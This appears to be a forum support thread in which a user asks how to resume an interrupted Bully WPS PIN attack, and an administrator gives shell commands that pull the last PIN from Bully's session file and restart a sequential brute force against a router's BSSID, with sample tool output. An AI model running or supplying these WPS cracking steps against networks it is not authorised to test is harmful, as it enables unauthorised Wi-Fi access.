Question Xiaopan Bully, possible to continue interrupted session?

Discussion in 'Xiaopan Support' started by John Wood, 3 Apr 2015.

  1. John Wood

    John Wood New Member

    21 Mar 2015
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    Hi All,

    I am trying to continue interrupted sessions from Bully wps (not brute force) . I was thinking to write down the last number being tested before I shut down the machine and when I will restart a new session another time I will request Bully to start from that specific number.

    Would this procedure work? I am not sure if Bully tests pin a sequence or just random pins.

    I have tried to restart Bully and even Reaver sessions by virtualization machines after paused but all attempts fail as I have to plug out the wifi adapter every time I interrupt sessions. That is why I am asking if I can continue from a specific number so I can take note of where I left and start again on another day with the last pin.

    Really appreciate if someone could help me out. Thanks in advance.
  2. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member VIP Admin

    18 May 2012
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    Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"):
    Select All
    $ tail /root/.bully/ # session ended 2014-04-27 03:08:48 with signal 2 63370002:63370002:1::
    You can extract it directly by using cut:
    Select All
    $ tail /root/.bully/ -n 1 | cut -d ":" -f 1 63370002
    And continue from there:
    Select All
    $ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002 [!] Bully v1.0-22 - WPS vulnerability assessment utility [+] Switching interface 'mon0' to channel '6' [!] Starting pin specified, defaulting to sequential mode [!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address [+] Datalink type set to '127', radiotap headers present [+] Scanning for beacon from '11:22:33:44:55:66' on channel '6' [+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66) [!] Restoring session from '/root/.bully/' [+] Index of starting pin number is '63370002' [+] Last State = 'NoAssoc' Next pin '63370002' [+] Rx( M7 ) = 'Pin2Bad' Next pin '63370003' [+] Rx( M7 ) = 'Pin2Bad' Next pin '63370004'
    Code Source:
    Similar, but should be useful to you
  3. John Wood

    John Wood New Member

    21 Mar 2015
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    Hi, Thanks for quick reply. Wouldn't this method only work when using brute force? because I was not going to use the brute force method since it takes a lot more time.
    --- Double Post Merged, 4 Apr 2015, Original Post Date: 4 Apr 2015 ---
    Also Bully asks me if I want to continue the session from a specific number. Can I just enter the number of the previously ended session so Bully can continue from there. I am not very practical using linux command, maybe this way is simpler than command line but not sure if it works correctly . Any way thanks for you help and all the valuable work you do on this forum.

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